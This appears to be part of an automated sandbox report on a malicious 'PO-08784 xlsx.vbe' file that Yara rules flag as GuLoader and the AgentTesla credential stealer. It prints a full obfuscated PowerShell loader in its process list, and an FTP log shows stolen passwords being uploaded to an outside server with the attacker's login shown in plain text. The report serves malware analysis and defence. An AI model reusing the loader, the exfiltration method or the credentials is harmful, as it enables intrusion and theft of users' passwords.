                                Nov 28, 2022 18:14:03.486603975 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.486684084 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.486687899 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.486689091 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.486690044 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.486706018 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.486706018 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.486733913 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.486809969 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.486810923 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.486840010 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.486840010 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.486920118 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.487032890 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.602055073 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.602243900 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.602268934 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.602340937 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.602463961 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.602469921 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.602519989 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.602653027 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.602660894 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.602732897 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.602791071 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.602860928 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.602897882 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.602899075 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.602914095 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.602957964 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.602967978 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.603020906 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.603055954 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.603055954 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.603074074 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.603115082 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.603127003 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.603180885 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.603230000 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.603234053 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.603230000 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.603287935 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.603290081 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.603341103 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.603387117 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.603387117 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.603394985 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.603445053 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.603449106 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.603502035 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.603554964 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.603554010 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.603554010 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.603606939 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.603611946 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.603660107 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.603708982 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.603714943 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.603708982 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.603770018 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.603770971 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.603825092 CET8049803192.185.145.188192.168.11.20
                                TimestampSource PortDest PortSource IPDest IP
                                Nov 28, 2022 18:14:03.095999956 CET5227853192.168.11.201.1.1.1
                                Nov 28, 2022 18:14:03.119677067 CET53522781.1.1.1192.168.11.20
                                Nov 28, 2022 18:14:08.765639067 CET5959453192.168.11.201.1.1.1
                                Nov 28, 2022 18:14:08.787539005 CET53595941.1.1.1192.168.11.20
                                Nov 28, 2022 18:14:17.763895035 CET5843553192.168.11.201.1.1.1
                                Nov 28, 2022 18:14:17.891381979 CET53584351.1.1.1192.168.11.20
                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Nov 28, 2022 18:14:03.095999956 CET192.168.11.201.1.1.10x4412Standard query (0)b3solutionscws.comA (IP address)IN (0x0001)false
                                Nov 28, 2022 18:14:08.765639067 CET192.168.11.201.1.1.10xf773Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                Nov 28, 2022 18:14:17.763895035 CET192.168.11.201.1.1.10xead4Standard query (0)ftp.mcmprint.netA (IP address)IN (0x0001)false
                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Nov 28, 2022 18:14:03.119677067 CET1.1.1.1192.168.11.200x4412No error (0)b3solutionscws.com192.185.145.188A (IP address)IN (0x0001)false
                                Nov 28, 2022 18:14:08.787539005 CET1.1.1.1192.168.11.200xf773No error (0)api.ipify.orgapi.ipify.org.herokudns.comCNAME (Canonical name)IN (0x0001)false
                                Nov 28, 2022 18:14:08.787539005 CET1.1.1.1192.168.11.200xf773No error (0)api.ipify.org.herokudns.com54.91.59.199A (IP address)IN (0x0001)false
                                Nov 28, 2022 18:14:08.787539005 CET1.1.1.1192.168.11.200xf773No error (0)api.ipify.org.herokudns.com3.220.57.224A (IP address)IN (0x0001)false
                                Nov 28, 2022 18:14:08.787539005 CET1.1.1.1192.168.11.200xf773No error (0)api.ipify.org.herokudns.com52.20.78.240A (IP address)IN (0x0001)false
                                Nov 28, 2022 18:14:08.787539005 CET1.1.1.1192.168.11.200xf773No error (0)api.ipify.org.herokudns.com3.232.242.170A (IP address)IN (0x0001)false
                                Nov 28, 2022 18:14:17.891381979 CET1.1.1.1192.168.11.200xead4No error (0)ftp.mcmprint.net185.31.121.136A (IP address)IN (0x0001)false
                                • api.ipify.org
                                • b3solutionscws.com
                                TimestampSource PortDest PortSource IPDest IPCommands
                                Nov 28, 2022 18:14:17.958723068 CET2149807185.31.121.136192.168.11.20220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.
                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:14. Server port: 21.
                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:14. Server port: 21.220-This is a private system - No anonymous login
                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:14. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:14. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                Nov 28, 2022 18:14:17.959058046 CET4980721192.168.11.20185.31.121.136USER klogz@mcmprint.net
                                Nov 28, 2022 18:14:17.991482973 CET2149807185.31.121.136192.168.11.20331 User klogz@mcmprint.net OK. Password required
                                Nov 28, 2022 18:14:17.991899967 CET4980721192.168.11.20185.31.121.136PASS l9Hh{#_(0shZ
                                Nov 28, 2022 18:14:18.040401936 CET2149807185.31.121.136192.168.11.20230 OK. Current restricted directory is /
                                Nov 28, 2022 18:14:18.073179960 CET2149807185.31.121.136192.168.11.20504 Unknown command
                                Nov 28, 2022 18:14:18.073748112 CET4980721192.168.11.20185.31.121.136PWD
                                Nov 28, 2022 18:14:18.106071949 CET2149807185.31.121.136192.168.11.20257 "/" is your current location
                                Nov 28, 2022 18:14:18.106791973 CET4980721192.168.11.20185.31.121.136CWD /
                                Nov 28, 2022 18:14:18.139123917 CET2149807185.31.121.136192.168.11.20250 OK. Current directory is /
                                Nov 28, 2022 18:14:18.139384031 CET4980721192.168.11.20185.31.121.136TYPE I
                                Nov 28, 2022 18:14:18.171904087 CET2149807185.31.121.136192.168.11.20200 TYPE is now 8-bit binary
                                Nov 28, 2022 18:14:18.173265934 CET4980721192.168.11.20185.31.121.136PASV
                                Nov 28, 2022 18:14:18.205801964 CET2149807185.31.121.136192.168.11.20227 Entering Passive Mode (185,31,121,136,220,91)
                                Nov 28, 2022 18:14:18.239839077 CET4980721192.168.11.20185.31.121.136STOR PW_user-367706_2022_11_28_18_14_15.html
                                Nov 28, 2022 18:14:18.274036884 CET2149807185.31.121.136192.168.11.20150 Accepted data connection
                                Nov 28, 2022 18:14:18.306859016 CET2149807185.31.121.136192.168.11.20226-File successfully transferred
                                226-File successfully transferred226 0.033 seconds (measured here), 13.71 Kbytes per second
                                Nov 28, 2022 18:15:57.808657885 CET2149807185.31.121.136192.168.11.20226 Logout.

                                Click to jump to process

                                Target ID:0
                                Start time:18:12:34
                                Start date:28/11/2022
                                Path:C:\Windows\System32\wscript.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-08784 xlsx.vbe"
                                Imagebase:0x7ff7b4380000
                                File size:170496 bytes
                                MD5 hash:0639B0A6F69B3265C1E42227D650B7D1
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                Target ID:2
                                Start time:18:12:36
                                Start date:28/11/2022
                                Path:C:\Windows\System32\cmd.exe
                                Wow64 process (32bit):false
                                Commandline:CMD.EXE /c echo C:\Windows
                                Imagebase:0x7ff7dd5d0000
                                File size:289792 bytes
                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                Target ID:3
                                Start time:18:12:36
                                Start date:28/11/2022
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6b8be0000
                                File size:875008 bytes
                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Target ID:4
                                Start time:18:12:59
                                Start date:28/11/2022
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""TakRaeOcrSpnDieSelHa3Ax2Ne`"""Ov)Su]InpTouVibStlSaiFucAb HasBltPhaDitFeiMacTo paeWaxSltSleRarTenCa ThiDenkatOv MiVJeiRersktLuuDiabalUnAPylUnlDaoCocAb(moimunGatke FevNa1Da,KoiGrnAntbi FivCr2Se,KriLanhvtAg Savaa3go,NoilenMatNa PavSe4Co)Im;Ma[DeDTilStlStIKlmpupLuoCarMitHa(Tv`"""BakVieEnrBenSteEllTh3Hu2bi`"""Tr)Pl]PopHauLabsalIniRacFj UnsBetBoasltDkiPocHi PhevaxGntNoeGurMrnFl AcIAgnIntKoPDatAnrOs SwELinWeuHamStSCoySksMatSlePlmfeLMooKacdeaKolCueSysDyWaf(OmuFoiBonChtMy TavBo1Ha,KiiSonOptSh FavUn2Ud)Un;Na}Li'Sl;Ar`$jeMHyeDatSuhmuyUrlLi3Ne=Ha[TiMAdeLytFehFoyMilCa1re]co:Ov:beVNoisyrretWhuAbaTelNoAAklGalUnoSicLi(In0Dr,ro1Ch0De4Ro8Le5Ob7sk6Co,Le1Me2Sp2Sv8Lo8Ea,No6ph4Mi)Mi;Re`$StSTaeBelKovRefLrlTrgEbeNylBeiBrgDu=Pr(BrGFieGytDe-reISttKreViminPDorSaoIrpBeeLarJetAfySc Ex-WoPCraSptAzhDe Tr'SvHveKFoCCoUUd:Co\CebKraResAnaBrlBotCa\DetAprGuaManFisNofEsonurMemKoaSktSkiByoAbnOushaaSulScgCioSkrExiVitCimSieCyregnIreUd'Pa)tu.LuBBoeEthsueAlaDyrStsReeJa;Be`$UnGHirEmiFosRakUneEn Bu=Bi Br[AsSTiyUnsObtTweDrmBe.LiCStoRenorvKieVarAptEn]Ma:Ap:GeFKlrInoMumUdBseaImsInePl6fi4CaSVotBarBaiTonWagva(Se`$BeSLeeSnlBlvJafHulAfgpeeFrlBeiPhgGi)Ap;Pu[PiSOvyelsThtOxeSemge.SiRObuFrnBrtapiMumKleju.PiISpnRatIneUnrSyoAppneSPreSkrCovTiiJacAkeLessl.SiMStaTarFosCohTaaprlFa]Bl:Ci:TrCBooOupSkyAf(Fl`$UnGKurPaiKrsBrkDrece,di Pe0Up,Br Vl Pi`$GlMNieBatBlhSiyMylDe3Pr,Pr Sp`$ZoGArrCriTesHakPheSt.PrcGroSpuPonKntSp)Ph;Ho[TiMHeeAltAkhKnyPrlFa1Au]Si:Ru:CuEHjnPruMemFrSKoyressetKoeSpmVoLSloNucCaaMulpeeinsOvWBr(Sa`$AvMSkeNotSthDdyStlMe3Ir,Ka Ud0Sl)Ne#Sc;""";Function Methyl4 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Teviss = $Teviss + $HS.Substring($i, 1); } $Teviss;}$Undefatigable0 = Methyl4 'SoIOrEReXAq ';$Undefatigable1= Methyl4 $Thyridia;&$Undefatigable0 $Undefatigable1;;
                                Imagebase:0xcd0000
                                File size:433152 bytes
                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.1784183387.00000000093A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:moderate

                                Target ID:5
                                Start time:18:12:59
                                Start date:28/11/2022
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6b8be0000
                                File size:875008 bytes
                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Target ID:15
                                Start time:18:13:30
                                Start date:28/11/2022
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.cmdline
                                Imagebase:0xbb0000
                                File size:2141552 bytes
                                MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Reputation:moderate

                                Target ID:16
                                Start time:18:13:31
                                Start date:28/11/2022
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6FA6.tmp" "c:\Users\user\AppData\Local\Temp\3uneeqsg\CSC7012D3CA523F4D77AF1E1BF90852658.TMP"
                                Imagebase:0x3a0000
                                File size:46832 bytes
                                MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                Target ID:17
                                Start time:18:13:51
                                Start date:28/11/2022
                                Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
                                Imagebase:0xc90000
                                File size:106496 bytes
                                MD5 hash:7BAE06CBE364BB42B8C34FCFB90E3EBD
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000011.00000000.1525854532.0000000001100000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                No disassembly